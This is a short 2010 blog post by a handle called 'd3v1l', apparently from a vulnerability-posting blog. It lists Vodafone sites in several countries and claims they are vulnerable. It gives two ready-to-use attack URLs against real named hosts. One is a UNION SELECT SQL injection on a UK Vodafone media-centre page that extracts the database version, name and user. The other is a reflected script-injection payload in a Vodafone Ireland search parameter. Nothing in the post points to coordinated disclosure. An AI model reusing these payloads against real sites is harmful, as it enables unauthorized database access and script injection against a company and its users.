Wednesday, September 29, 2010

Several Vodafone sites vulnerable to XSS,Sql

0
in

#Risk: (4/5)
#Release Date: 29.09.2010
#Vulnerability discovered by: d3v1l

Vodafone.com , Vodafone.ro , Vodafone.com.tr , Vodafone.com.au , Vodafone.es , Vodafone.it , Vodafone.gr , Vodafone.ie , Vodafone.in , Vodafone.de , Vodafone.co.uk

Sql-injection


http://mediacentre.vodafone.co.uk/news_view_doc.php?type=press&doc_id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),database(),user()),15--

Xss

http://www.vodafone.ie/search/Search.shtml?site=10_163_142_helpsupport&q=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E

0 comments:

Post a Comment

About Me

My photo
Блог за истражување и развој на информациска безбедност, кој е наменет за постирање на најнови ранливости и слабости. Founder darknessn1k0!4

 
Design by ThemeShift | Bloggerized by Lasantha - Free Blogger Templates | Best Web Hosting